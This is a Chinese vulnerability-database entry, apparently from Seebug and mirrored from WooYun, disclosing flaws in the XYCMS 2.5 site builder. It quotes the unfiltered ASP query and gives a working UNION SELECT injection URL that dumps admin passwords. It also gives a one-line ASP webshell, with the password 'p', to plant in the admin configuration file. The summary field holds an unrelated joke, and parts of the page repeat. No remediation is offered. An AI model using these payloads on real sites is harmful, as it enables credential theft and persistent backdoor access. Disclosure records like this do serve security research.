XYCMS企业建站系统 2.5(注射&&后台配置插马)

基本字段

漏洞编号：: SSV-95631

披露/发现时间：: 2014-09-22

提交时间：: 2014-09-22

漏洞等级：

漏洞类别：: 其他类型

影响组件：: XYCMS

漏洞作者：: 宇少

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2014-076715

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述：前年她17岁，她看到我的IPad，说“姐夫，你的IPad不错嘛！” 她回去的时候，她姐姐把IPhone给她带上了。去年她18岁，她看到我的IBM后，说“姐夫，你的IBM不错嘛！” 她回去的时候，她姐姐把IBM笔记本给她带上了。今年她19岁，她看到我后，害羞的说：“姐夫，其实你这人挺不错的” 我在等她姐姐发话。 ### 详细说明： #1 存在注入漏洞文件： news_detail.asp 1-14行 ``` <%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>    <% id=request.QueryString("id") set rs=server.createobject("adodb.recordset") exec="select * from [news] where id="& id rs.open exec,conn,1,1 if rs.eof then response.Write "<div style=""padding:10px"">无此新闻信息！</a>" response.End() end if %> ``` id没过滤进入查询同样的问题：common.asp pro.asp news.asp pro_detail.asp ### 漏洞证明：注入利用exp： http://192.168.0.112/news_detail.asp?id=59%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12%20from%20admin_user [<img src="https://images.seebug.org/upload/201409/20132249505a10ea482f961703b49213719a4ca8.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/20132249505a10ea482f961703b49213719a4ca8.jpg) #2 后台配置文件插马进入后台系统设置：随便一处插入"%><%execute(Request(chr(112)))%><%'" 密码：p [<img src="https://images.seebug.org/upload/201409/20131440bdac029de84aea23db8a588e065663f0.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/20131440bdac029de84aea23db8a588e065663f0.jpg) 之后连接文件：http://domain/inc/config.asp [<img src="https://images.seebug.org/upload/201409/2013165517710306011dc1a3548eafa2376e553b.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2013165517710306011dc1a3548eafa2376e553b.jpg) /inc/config.asp

简要描述：

前年她17岁，她看到我的IPad，说“姐夫，你的IPad不错嘛！” 她回去的时候，她姐姐把IPhone给她带上了。去年她18岁，她看到我的IBM后，说“姐夫，你的IBM不错嘛！” 她回去的时候，她姐姐把IBM笔记本给她带上了。今年她19岁，她看到我后，害羞的说：“姐夫，其实你这人挺不错的” 我在等她姐姐发话。

详细说明：

#1 存在注入漏洞文件： news_detail.asp 1-14行

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<!--#include file="xyconn.asp"-->
<!--#include file="inc/config.asp"-->
<!--#include file="inc/xycms.asp"-->
<%
id=request.QueryString("id")
set rs=server.createobject("adodb.recordset") 
exec="select * from [news] where id="& id
rs.open exec,conn,1,1
if rs.eof then
response.Write "<div style=""padding:10px"">无此新闻信息！</a>"
response.End()
end if
%>

id没过滤进入查询同样的问题：common.asp pro.asp news.asp pro_detail.asp

漏洞证明：

注入利用exp： http://192.168.0.112/news_detail.asp?id=59%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12%20from%20admin_user

#2 后台配置文件插马进入后台系统设置：随便一处插入"%><%execute(Request(chr(112)))%><%'" 密码：p

之后连接文件：http://domain/inc/config.asp

/inc/config.asp

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2014-076715

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

XYCMS企业建站系统 2.5(注射&&后台配置插马)

基本字段

来源